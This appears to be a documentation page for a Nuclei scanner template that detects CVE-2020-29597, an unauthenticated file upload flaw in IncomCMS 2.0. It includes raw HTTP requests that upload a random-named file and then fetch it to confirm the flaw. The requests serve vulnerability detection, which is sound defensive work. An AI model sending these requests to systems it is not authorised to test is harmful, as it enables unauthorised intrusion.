Skip to content
Nuclei Templates

IncomCMS 2.0 - Arbitrary File Upload

ID: CVE-2020-29597

Severity: critical

Author: princechaddha

Tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project

Description

Section titled “Description”

IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.

YAML Source

Section titled “YAML Source”
id: CVE-2020-29597


info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patch or update to a version that addresses the vulnerability.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
    - https://github.com/trhacknon/CVE-2020-29597
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.78448
    epss-percentile: 0.9817
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project


http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt


        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html


        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'


      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'
# digest: 4b0a004830460221009b3c8840803b6bb5baa29820f6d8a5cf092262489feeb2488e6d4463f1b32794022100b9899039e4e7fc90203d5cc13f064b1efee4c5c8699d785a095e6bea6a2a8b09:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-29597.yaml"

View on Github